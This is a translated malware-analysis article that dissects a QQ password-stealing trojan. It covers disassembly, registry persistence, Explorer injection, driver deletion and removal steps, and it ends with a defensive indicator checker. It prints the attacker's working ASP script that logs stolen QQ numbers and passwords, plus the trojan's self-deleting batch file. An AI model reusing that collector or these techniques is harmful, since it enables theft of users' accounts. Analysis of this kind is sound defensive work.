Analysis of the QQ Black Hand (QQ黑手) from the Hacker Defense (黑防) CD
Author: 混世魔王 QQ:26836659
Source: 邪恶八进制信息安全团队 (EvilOctal Information Security Team)
Note: this article was previously published in Hacker Defense (《黑客防线》) magazine to earn a little money; experts may skip it. Where it falls short, I welcome corrections.
I read the official notice from Hacker Defense: in the "Monthly Feature" column of the issue 6 CD, the tool bundled with the DVBBS (动网) vulnerability exploitation video triggers antivirus alerts as Trojan-PSW.Win32.QQShou.ed. I thought: I, Old Devil, already count as fairly black-hat, yet here is someone even blacker. The student has surpassed the master... So I analysed this malicious program, partly to build up my own experience with manual removal, and partly to help friends who got infected clean it out completely.
First check the packer with PEiD: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]. There are plenty of UPX unpackers online, but I won't bother downloading one; PEiD's UPX FILEINFO plugin easily gives the OEP of a UPX-packed program.
The OEP here is 4056D8. Load the file in OD, press F4 to run to 4056D8 and dump it there; unpacking is done. Checking again with PEiD gives Borland Delphi 6.0 - 7.0. Whether you repair the dump after unpacking is up to you; we aren't going to run it anyway.
Load the unpacked program in OD and let's analyse it.
00404935 50 PUSH EAX
00404936 E8 71FCFFFF CALL
0040493B 85C0 TEST EAX,EAX
0040493D 75 07 JNZ SHORT 2.00404946
0040493F C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43
00404946 8A85 00FFFFFF MOV AL,BYTE PTR SS:[EBP-100]
0040494C 50 PUSH EAX
0040494D E8 E2FCFFFF CALL
00404952 83F8 01 CMP EAX,1
00404955 1BC0 SBB EAX,EAX
00404957 40 INC EAX
00404958 84C0 TEST AL,AL
0040495A 75 07 JNZ SHORT 2.00404963
0040495C C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43 // here Hex(43) = Char('C'): the C: drive
00404963 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404969 8A95 00FFFFFF MOV DL,BYTE PTR SS:[EBP-100]
0040496F E8 CCEDFFFF CALL 2.00403740
00404974 8B95 FCFEFFFF MOV EDX,DWORD PTR SS:[EBP-104]
0040497A 8BC3 MOV EAX,EBX
0040497C B9 B4494000 MOV ECX,2.004049B4 ; :\program files\internet explorer\plugins\
00404981 E8 2EEEFFFF CALL 2.004037B4
00404986 33C0 XOR EAX,EAX
00404988 5A POP EDX
00404989 59 POP ECX
0040498A 59 POP ECX
After the program runs, it first creates files in the system directory at the path:
C:\Program Files\Internet Explorer\PLUGINS\
Go there and you will find two extra files: bow.sys, a dynamic link library, and bow.bak. How do you tell they were generated by the trojan? Look closely at the files' creation dates.
Note that these files are hidden; you must show all files to see them.
Let's open bow.sys in OD and look at its contents:
003E4E1A |. 50 PUSH EAX /pDisposition
003E4E1B |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] ; |
003E4E1F |. 50 PUSH EAX ; |pHandle
003E4E20 |. 6A 00 PUSH 0 ; |pSecurity = NULL
003E4E22 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00 PUSH 0 ; |Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00 PUSH 0 ; |Class = NULL
003E4E2B |. 6A 00 PUSH 0 ; |Reserved = 0
003E4E2D |. 68 744E3E00 PUSH bow.003E4E74 ; |software\ms\qqguishou
003E4E32 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF CALL
It writes the registry key
HKEY_CURRENT_USER\Software\Ms\QQGuiShou
"QQGuiShou": the pinyin for "QQ鬼手" (QQ Ghost Hand)? According to Google, a QQ-stealing program by that name does exist.
Continuing the analysis:
:00407715 A124A14000 mov eax, dword ptr [0040A124]
:0040771A 8B4018 mov eax, dword ptr [eax+18]
:0040771D 50 push eax
:0040771E A124A14000 mov eax, dword ptr [0040A124]
:00407723 8B4014 mov eax, dword ptr [eax+14]
:00407726 50 push eax
* Possible StringData Ref from Code Obj ->"QQ打击波给你送礼品啦-->("
:00407727 68947A4000 push 00407A94
:0040772C FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->"----"
:0040772F 68B87A4000 push 00407AB8
:00407734 FF75F4 push [ebp-0C]
:00407737 68C87A4000 push 00407AC8
:0040773C 8D45CC lea eax, dword ptr [ebp-34]
:0040773F BA05000000 mov edx, 00000005
:00407744 E853BDFFFF call 0040349C
:00407749 8B45CC mov eax, dword ptr [ebp-34]
:0040774C 50 push eax
* Possible StringData Ref from Code Obj ->" 号码:"
:0040774D 68D47A4000 push 00407AD4
:00407752 FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->" ----暗码:"
:00407755 68E47A4000 push 00407AE4
:0040775A FF75F4 push [ebp-0C]
* Possible StringData Ref from Code Obj ->" ----可用游戏币:"
:0040775D 68F87A4000 push 00407AF8
:00407762 8D55C4 lea edx, dword ptr [ebp-3C]
:00407765 8B45DC mov eax, dword ptr [ebp-24]
:00407768 E8E7D7FFFF call 00404F54
:0040776D FF75C4 push [ebp-3C]
* Possible StringData Ref from Code Obj ->" ----保存的:"
:00407770 68147B4000 push 00407B14
:00407775 8D55C0 lea edx, dword ptr [ebp-40]
:00407778 8B45E0 mov eax, dword ptr [ebp-20]
:0040777B E8D4D7FFFF call 00404F54
:00407780 FF75C0 push [ebp-40]
* Possible StringData Ref from Code Obj ->" ----积分:"
:00407783 682C7B4000 push 00407B2C
:00407788 8D55BC lea edx, dword ptr [ebp-44]
:0040778B 8B45EC mov eax, dword ptr [ebp-14]
:0040778E E8C1D7FFFF call 00404F54
:00407793 FF75BC push [ebp-44]
* Possible StringData Ref from Code Obj ->" ----是否是会员:"
:00407796 68407B4000 push 00407B40
:0040779B 8D55B8 lea edx, dword ptr [ebp-48]
:0040779E 8B45D4 mov eax, dword ptr [ebp-2C]
:004077A1 E8AED7FFFF call 00404F54
:004077A6 FF75B8 push [ebp-48]
* Possible StringData Ref from Code Obj ->" ----品级:"
|
:004077A9 685C7B4000 push 00407B5C
:004077AE 8D55B4 lea edx, dword ptr [ebp-4C]
:004077B1 8B45D0 mov eax, dword ptr [ebp-30]
:004077B4 E89BD7FFFF call 00404F54
:004077B9 FF75B4 push [ebp-4C]
* Possible StringData Ref from Code Obj ->" ----游戏点:"
|
:004077BC 68707B4000 push 00407B70
:004077C1 8D55B0 lea edx, dword ptr [ebp-50]
:004077C4 8B45E4 mov eax, dword ptr [ebp-1C]
:004077C7 E888D7FFFF call 00404F54
:004077CC FF75B0 push [ebp-50]
* Possible StringData Ref from Code Obj ->" ----IP: "
"QQ Shockwave is sending you a gift!" Quite a gift indeed: after a query to the QQ site, your QQ number, password, available game coins, membership status, points, level, game points and IP are all sent off as the "gift". It writes its own sys into this, together with the configuration information at the end of the program.
Sigh, trojans keep getting better and better... It submits via POST to an ASP web page, which saves the received passwords. Interested readers can capture a packet and take a look; I won't plunder someone else's fruits of labour here. The ASP code that receives the passwords is as follows:
<%
LogFile="log.txt"
LogFileGB="LOGGB.txt"
QQNumber=request("Number")
QQPassWord=request("PassWord")
QQGBA=request("yxba")
QQGBB=request("yxbb")
if QQGBA="" then
QQGBA="no"
end if
if QQGBB="" then
QQGBB="no"
end if
LogText=QQNumber&"----"&QQPassWord
LogTextGB=QQNumber&"----"&QQPassWord &"----QQGBA:"& QQGBA&"----QQGBB:"& QQGBB
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)
ff.writeline(LogText)
ff.close
set ff=nothing
set f=nothing
set f1=Server.CreateObject("scripting.filesystemobject")
set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)
ff1.writeline(LogTextGB)
ff1.close
set ff1=nothing
set f1=nothing
%>
00404AFB 55 PUSH EBP
00404AFC 68 A04B4000 PUSH 2.00404BA0
00404B01 64:FF30 PUSH DWORD PTR FS:[EAX]
00404B04 64:8920 MOV DWORD PTR FS:[EAX],ESP
00404B07 68 AC4B4000 PUSH 2.00404BAC
00404B0C B9 B04B4000 MOV ECX,2.00404BB0 ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B11 BA D84B4000 MOV EDX,2.00404BD8 ; software\microsoft\windows\currentversion\explorer\shellexecutehooks
00404B16 B8 02000080 MOV EAX,80000002
00404B1B E8 70FFFFFF CALL 2.00404A90
00404B20 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B23 BA 284C4000 MOV EDX,2.00404C28 ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B28 E8 8BEBFFFF CALL 2.004036B8
00404B2D 68 AC4B4000 PUSH 2.00404BAC
00404B32 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00404B35 E8 1EEEFFFF CALL 2.00403958
00404B3A 8BD0 MOV EDX,EAX
00404B3C B9 AC4B4000 MOV ECX,2.00404BAC
00404B41 B8 00000080 MOV EAX,80000000
00404B46 E8 45FFFFFF CALL 2.00404A90
00404B4B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B4E BA 604C4000 MOV EDX,2.00404C60 ; \inprocserver32apartment
00404B53 E8 18ECFFFF CALL 2.00403770
It writes the registry value
80000000
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}
and registers the COM component server:
0012FF20 80000000 |hKey = HKEY_CLASSES_ROOT
0012FF24 00404C28 |Subkey = "CLSID\{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"
Finally LoadLibrary is used to run the trojan program.
00404E56 8B95 2CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1D4]
00404E5C 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404E5F B9 B44F4000 MOV ECX,2.00404FB4 ; microsoft.bat
00404E64 E8 4BE9FFFF CALL 2.004037B4
00404E69 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
00404E6C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E72 E8 B1DBFFFF CALL 2.00402A28
00404E77 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E7D E8 42D9FFFF CALL 2.004027C4
00404E82 E8 11D7FFFF CALL 2.00402598
00404E87 BA CC4F4000 MOV EDX,2.00404FCC ; :try
00404E8C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E92 E8 55ECFFFF CALL 2.00403AEC
00404E97 E8 A8DEFFFF CALL 2.00402D44
00404E9C E8 F7D6FFFF CALL 2.00402598
00404EA1 68 DC4F4000 PUSH 2.00404FDC ; del "
00404EA6 8D95 20FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E0]
00404EAC 33C0 XOR EAX,EAX
00404EAE E8 41D8FFFF CALL 2.004026F4
00404EB3 FFB5 20FEFFFF PUSH DWORD PTR SS:[EBP-1E0]
00404EB9 68 EC4F4000 PUSH 2.00404FEC ; "
00404EBE 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC]
00404EC4 BA 03000000 MOV EDX,3
00404EC9 E8 5AE9FFFF CALL 2.00403828
00404ECE 8B95 24FEFFFF MOV EDX,DWORD PTR SS:[EBP-1DC]
00404ED4 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404EDA E8 0DECFFFF CALL 2.00403AEC
00404EDF E8 60DEFFFF CALL 2.00402D44
00404EE4 E8 AFD6FFFF CALL 2.00402598
00404EE9 68 F84F4000 PUSH 2.00404FF8 ; if exist "
00404EEE 8D95 18FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E8]
00404EF4 33C0 XOR EAX,EAX
00404EF6 E8 F9D7FFFF CALL 2.004026F4
00404EFB FFB5 18FEFFFF PUSH DWORD PTR SS:[EBP-1E8]
00404F01 68 EC4F4000 PUSH 2.00404FEC ; "
00404F06 68 0C504000 PUSH 2.0040500C ; goto try
00404F0B 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4]
00404F11 BA 04000000 MOV EDX,4
00404F16 E8 0DE9FFFF CALL 2.00403828 // this CALL invokes LoadLibrary to run the trojan program
00404F1B 8B95 1CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1E4]
00404F21 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F27 E8 C0EBFFFF CALL 2.00403AEC
00404F2C E8 13DEFFFF CALL 2.00402D44
00404F31 E8 62D6FFFF CALL 2.00402598
00404F36 BA 20504000 MOV EDX,2.00405020 ; del %0
00404F3B 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F41 E8 A6EBFFFF CALL 2.00403AEC
00404F46 E8 F9DDFFFF CALL 2.00402D44
00404F4B E8 48D6FFFF CALL 2.00402598
00404F50 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F56 E8 89DBFFFF CALL 2.00402AE4
00404F5B E8 38D6FFFF CALL 2.00402598
I was debugging on the desktop, so a microsoft.bat file was generated on the desktop and executed via CMD.
It creates microsoft.bat to delete itself; the contents are:
:try
del "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe"
if exist "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe" goto try
del %0
Finally it ends the process.
003E9B3D |. E8 7697FFFF CALL bow.003E32B8
003E9B42 |. 68 D09D3E00 PUSH bow.003E9DD0 ; ASCII "QQ.Exe"
003E9B47 |. A1 4CB83E00 MOV EAX,DWORD PTR DS:[3EB84C]
003E9B4C |. E8 8B9AFFFF CALL bow.003E35DC
003E9B51 |. 8BD8 MOV EBX,EAX ; |
003E9B53 |. 53 PUSH EBX ; |String1
003E9B54 |. E8 4FA8FFFF CALL
003E9B59 |. 85C0 TEST EAX,EAX
003E9B5B |. 75 7B JNZ SHORT bow.003E9BD8
003E9B5D |. 8D45 B4 LEA EAX,DWORD PTR SS:[EBP-4C]
003E9B60 |. 8BD6 MOV EDX,ESI
003E9B62 |. B9 05010000 MOV ECX,105
003E9B67 |. E8 5898FFFF CALL bow.003E33C4
003E9B6C |. 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C]
003E9B6F |. 8D55 B8 LEA EDX,DWORD PTR SS:[EBP-48]
003E9B72 |. E8 25C6FFFF CALL bow.003E619C
003E9B77 |. 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]
003E9B7A |. B8 48B83E00 MOV EAX,bow.003EB848
003E9B7F |. E8 3497FFFF CALL bow.003E32B8
003E9B84 |. 8D45 B0 LEA EAX,DWORD PTR SS:[EBP-50]
003E9B87 |. B9 E09D3E00 MOV ECX,bow.003E9DE0 ; ASCII "LoginCtrl.dll"
003E9B8C |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]
003E9B92 |. E8 9198FFFF CALL bow.003E3428
003E9B97 |. 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50]
003E9B9A |. E8 3D9AFFFF CALL bow.003E35DC
003E9B9F |. 50 PUSH EAX ; /FileName
003E9BA0 |. E8 BBA7FFFF CALL
003E9BA5 |. A3 18A13E00 MOV DWORD PTR DS:[3EA118],EAX
003E9BAA |. 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]
003E9BAD |. B9 F89D3E00 MOV ECX,bow.003E9DF8 ; ASCII "npkcrypt.sys"
003E9BB2 |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]
003E9BB8 |. E8 6B98FFFF CALL bow.003E3428
003E9BBD |. 8B45 AC MOV EAX,DWORD PTR SS:[EBP-54]
003E9BC0 |. E8 179AFFFF CALL bow.003E35DC
003E9BC5 |. 50 PUSH EAX ; /FileName
003E9BC6 |. E8 05A7FFFF CALL
003E9BCB |. A1 28A13E00 MOV EAX,DWORD PTR DS:[3EA128]
003E9BD0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1
003E9BD6 |. EB 1E JMP SHORT bow.003E9BF6
003E9BD8 |> 68 089E3E00 PUSH bow.003E9E08 ; /String2 = "Explorer.Exe"
003E9BDD |. 53 PUSH EBX ; |String1
003E9BDE |. E8 C5A7FFFF CALL
003E9BE3 |. 85C0 TEST EAX,EAX
003E9BE5 |. 0F85 BB010000 JNZ bow.003E9DA6
003E9BEB |. A1 30A13E00 MOV EAX,DWORD PTR DS:[3EA130]
003E9BF0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1
003E9BF6 |> 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
003E9BFB |. 56 PUSH ESI ; |PathBuffer
003E9BFC |. A1 50B63E00 MOV EAX,DWORD PTR DS:[3EB650] ; |
003E9C01 |. 50 PUSH EAX ; |hModule => NULL
003E9C02 |. E8 09A7FFFF CALL
The program injects itself into the Explorer.exe process, a very popular technique. Don't believe it? Use IceSword to inspect the Explorer.exe process.
However, when the trojan loads it deletes the npkcrypt.sys driver. According to Google, QQ2005 Beta3 and later integrate a keyboard encryption program called npkcrypt, supposedly to protect the security of password input, but in reality it installs an unexplained driver on the user's system without the user's consent. After installing that version, passwords can no longer be entered by pasting, and QQ users with Chinese passwords cannot log in.
The trojan deletes npkcrypt.sys and then runs the original QQ program, so it can set up its hook to record the password you type. The trojan is registered as a service, so you will not see a startup entry in the auto-start list.
From the analysis above, deleting the bow.sys files and the registry keys should dispose of this trojan easily. But there is an after-effect: our npkcrypt.sys driver was deleted, so after a reboot an error dialog pops up saying a service failed to run.
Right-click "My Computer", choose "Manage" -> "Device Manager", select "View" / "Show hidden devices", under "Non-Plug and Play Drivers" select "npkcrypt" and uninstall it (you may restart). Then run "regedit" from CMD and search the registry for "npkcrypt"; you will probably find keys such as "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\npkcrypt" or "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\npkcrypt". Deleting them and rebooting usually resolves the problem. Search for npkcrypt.* and delete it.
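As an added example (not code from the article), a Python checker for the traces the article lists: the ShellExecuteHooks CLSID, the HKCU\Software\Ms\QQGuiShou marker key and the bow.sys/bow.bak drop in the IE PLUGINS folder. It goes slightly beyond the article by flagging any ShellExecuteHooks server whose InprocServer32 lies outside System32, since that is where this persistence method shows up in general. The function names evaluate() and snapshot_live() are my own; live collection needs Windows (winreg), while evaluate() runs anywhere on a supplied snapshot.

```python
import os
try:
    import winreg          # Windows only; evaluate() itself runs on any platform
except ImportError:
    winreg = None

# Indicator values taken from the article
HOOK_CLSID = "{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"
HOOK_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
MARKER_KEY = r"Software\Ms\QQGuiShou"
DROP_DIR = r"C:\Program Files\Internet Explorer\PLUGINS"
DROP_FILES = {"bow.sys", "bow.bak"}

def evaluate(hooks, hkcu_keys, plugin_files):
    """hooks: {clsid: InprocServer32 path} from HKLM ShellExecuteHooks; hkcu_keys:
    key paths present under HKCU; plugin_files: names in DROP_DIR. Returns findings."""
    findings = []
    for clsid, server in hooks.items():
        if clsid.upper() == HOOK_CLSID:
            findings.append(f"known QQGuiShou hook {clsid} -> {server}")
        elif "\\system32\\" not in server.lower():
            # legitimate hook servers live under System32; anything else deserves a look
            findings.append(f"ShellExecuteHooks server outside System32: {clsid} -> {server}")
    if any(k.lower() == MARKER_KEY.lower() for k in hkcu_keys):
        findings.append(rf"HKCU\{MARKER_KEY} present")
    findings += [rf"{DROP_DIR}\{f} present" for f in plugin_files if f.lower() in DROP_FILES]
    return findings

def snapshot_live():
    """Collect the three inputs for evaluate() on a Windows host (hypothetical helper)."""
    hooks, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, HOOK_KEY) as hk:
        while True:
            try:
                clsid = winreg.EnumValue(hk, i)[0]   # value names are the hook CLSIDs
            except OSError:
                break                                # no more values
            i += 1
            try:
                with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, rf"CLSID\{clsid}\InprocServer32") as sk:
                    hooks[clsid] = winreg.QueryValueEx(sk, "")[0]
            except OSError:
                hooks[clsid] = "<no InprocServer32>"   # dangling hook, still reported
    try:
        winreg.CloseKey(winreg.OpenKey(winreg.HKEY_CURRENT_USER, MARKER_KEY))
        hkcu_keys = [MARKER_KEY]
    except OSError:
        hkcu_keys = []
    files = os.listdir(DROP_DIR) if os.path.isdir(DROP_DIR) else []
    return hooks, hkcu_keys, files
```

On the suspect host, run evaluate(*snapshot_live()) and review the returned findings before deleting anything.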
OK, that takes care of this little trojan. Finally, shame on whoever planted it; remember where your water comes from. Whatever you say, Hacker Defense is where we newbies got started; now that you are an old bird, how can you bully the little birds? Be decent.
- Article author: 福州军威计算机技术有限公司 (Fuzhou Junwei Computer Technology Co., Ltd.)
Copyright notice: original work; reposting is permitted, but when reposting you must indicate the original source as a hyperlink, together with the author information and this notice. Otherwise legal liability will be pursued.